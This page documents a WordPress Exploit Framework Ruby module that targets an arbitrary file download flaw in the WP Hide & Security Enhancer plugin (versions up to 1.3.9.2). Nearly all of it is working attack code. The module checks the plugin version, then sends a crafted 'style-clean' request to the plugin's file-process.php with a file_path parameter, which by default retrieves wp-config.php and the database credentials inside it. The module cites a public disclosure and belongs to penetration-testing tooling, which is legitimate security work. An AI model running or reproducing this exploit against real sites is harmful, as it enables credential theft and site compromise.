class Wpxf::Auxiliary::WpHideSecurityEnhancerFileDownload

Public Class Methods

new() click to toggle source
Calls superclass method Wpxf::WordPress::FileDownload::new
# File lib/wpxf/modules/auxiliary/file_download/wp_hide_security_enhancer_file_download.rb, line 6
def initialize
  super

  update_info(
    name: 'WP Hide & Security Enhancer <= 1.3.9.2 File Download',
    author: [
      'Julio Potier', # Disclosure
      'rastating'     # WPXF module
    ],
    references: [
      ['WPVDB', '8867'],
      ['URL', 'https://secupress.me/blog/arbitrary-file-download-vulnerability-in-wp-hide-security-enhancer-1-3-9-2/']
    ],
    date: 'Jul 21 2017'
  )
end

Public Instance Methods

check() click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/wp_hide_security_enhancer_file_download.rb, line 23
def check
  check_plugin_version_from_readme('wp-hide-security-enhancer', '1.3.9.3')
end
default_remote_file_path() click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/wp_hide_security_enhancer_file_download.rb, line 27
def default_remote_file_path
  'wp-config.php'
end
download_request_params() click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/wp_hide_security_enhancer_file_download.rb, line 39
def download_request_params
  {
    'action' => 'style-clean',
    'file_path' => "/#{remote_file}"
  }
end
downloader_url() click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/wp_hide_security_enhancer_file_download.rb, line 35
def downloader_url
  normalize_uri(wordpress_url_plugins, 'wp-hide-security-enhancer', 'router', 'file-process.php')
end
validate_content(content) click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/wp_hide_security_enhancer_file_download.rb, line 46
def validate_content(content)
  if content.empty?
    emit_error 'No content returned, file may not exist.'
    return false
  end

  super
end
working_directory() click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/wp_hide_security_enhancer_file_download.rb, line 31
def working_directory
  'the WordPress installation directory'
end